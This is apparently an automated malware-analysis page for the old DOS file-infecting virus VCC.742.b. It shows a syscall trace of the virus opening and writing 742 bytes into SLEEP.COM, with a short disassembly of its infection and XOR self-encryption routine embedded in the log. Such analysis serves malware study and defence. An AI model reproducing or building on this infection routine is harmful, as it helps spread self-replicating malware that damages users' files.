Sample viewer

vx.netlux.org/Virus.DOS.VCC.742.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:29:19.769995256Z 26 PC: 12e46 | Set disk transfer address
2018-12-17T22:29:19.773129686Z 78 PC: 12e5a | Find first file
2018-12-17T22:29:19.779156477Z 61 PC: 1309c | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:29:19.785821096Z 63 PC: 130ab | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:29:19.793547965Z 66 PC: 130ba | Move file pointer
2018-12-17T22:29:19.795349829Z 66 PC: 130c9 | Move file pointer
2018-12-17T22:29:19.797086638Z 64 PC: 130d5 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:29:19.800578593Z 66 PC: 130e1 | Move file pointer
2018-12-17T22:29:19.802962267Z 44 PC: 130e5 | Get time 0x130e5: mov byte ptr [bp + 0x2e6], dl
0x130e9: call 0x130ff
0x130ec: mov ah, 0x40
0x130ee: mov cx, 0x2e6
0x130f1: lea dx, word ptr [bp + 6]
0x130f5: int 0x21
0x130f7: call 0x130ff
0x130fa: mov ah, 0x3e
0x130fc: int 0x21
0x130fe: ret
0x130ff: lea si, word ptr [bp + 0x11]
0x13103: mov cx, 0x2b6
0x13106: xor byte ptr [si], 0x46
0x13109: inc si
0x1310a: dec cx
0x1310b: jne 0x13106
0x1310d: ret
0x1310e: add word ptr [bx], di
0x13110: aas
0x13111: aas
2018-12-17T22:29:19.805589077Z 64 PC: 130f7 | Write file or device (Write 742 bytes on handle 5)
2018-12-17T22:29:19.820918251Z 62 PC: 130fe | Close file
2018-12-17T22:29:19.829040562Z 26 PC: 12e6a | Set disk transfer address
2018-12-17T22:29:19.830383686Z 9 PC: 12e7c | Display string (Could not find end pointer)